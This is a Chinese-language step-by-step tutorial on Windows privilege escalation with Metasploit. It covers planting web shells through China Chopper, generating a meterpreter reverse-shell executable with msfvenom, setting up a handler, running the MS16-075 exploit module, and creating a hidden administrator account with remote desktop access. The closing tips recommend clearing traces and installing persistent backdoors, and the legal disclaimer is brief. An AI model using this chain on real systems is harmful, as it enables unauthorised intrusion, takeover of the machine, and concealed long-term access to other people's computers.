msf提权简单利用
字数 949 2025-08-12 11:34:37
Metasploit Framework (MSF) 提权利用指南
概述
本指南详细介绍了使用Metasploit Framework (MSF)进行提权的基本流程和方法,主要针对Windows系统。通过本教程,您将学习如何从初始访问到最终获取系统管理员权限的完整过程。
准备工作
-
目标系统准备:
- 在目标机器上传小马文件
- 使用中国菜刀连接目标机器
- 通过菜刀上传大马文件
- 使用大马生成系统信息文件:
systeminfo > C:\www\KingCMS\q.txt
-
补丁分析:
- 使用wesng工具进行补丁筛选:
python wes.py q.txt -o vuln.csv
- 使用wesng工具进行补丁筛选:
-
MSF环境准备:
- 连接云服务器
- 下载并安装Metasploit Framework:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall
生成并部署Payload
-
生成反弹shell的exe文件:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[攻击机IP] LPORT=5555 -f exe > q.exeLHOST: 攻击机IP地址LPORT: 监听端口(示例中使用5555)
-
传输payload到目标系统:
- 安装rz/sz命令:
yum install lrzsz - 下载exe文件到本地:
sz q.exe - 通过菜刀将q.exe上传到目标Windows服务器
- 安装rz/sz命令:
建立监听会话
-
启动MSF控制台:
msfconsole -
设置监听:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options set lport 5555 set lhost 0.0.0.0 exploit -
触发payload:
- 在菜刀中执行上传的q.exe文件
- 打开虚拟终端执行命令
会话管理
- 基本命令:
getuid: 查看当前用户权限background: 保存当前会话并退出
提权操作
-
使用MS16-075漏洞提权:
search ms16-075 use [模块编号] # 通常为1 set payload windows/x64/meterpreter/reverse_tcp set session [会话编号] # 查看之前挂起的会话编号 set lport 6666 # 更换端口 set lhost [攻击机IP] exploit -
提权成功后操作:
- 输入
shell进入系统shell - 创建新用户:
net user username password /add - 将用户添加到远程桌面组:
net localgroup "Remote Desktop Users" username /add - 将用户提升为管理员:
net localgroup Administrators username /add
- 输入
-
远程访问:
- 使用新创建的用户凭据通过远程桌面连接目标系统
注意事项
-
法律合规:
- 本技术仅用于合法授权测试
- 未经授权对系统进行渗透测试是违法行为
-
技术要点:
- 确保payload与目标系统架构匹配(32位/64位)
- 监听端口应选择不常用的端口以避免冲突
- 提权漏洞选择应根据目标系统补丁情况决定
-
后续操作:
- 建议清除痕迹,删除上传的文件
- 对于长期访问,建议建立持久化后门
通过以上步骤,您应该能够成功利用MSF对目标Windows系统进行提权操作。请记住,这些技术应仅用于合法的安全测试和防御目的。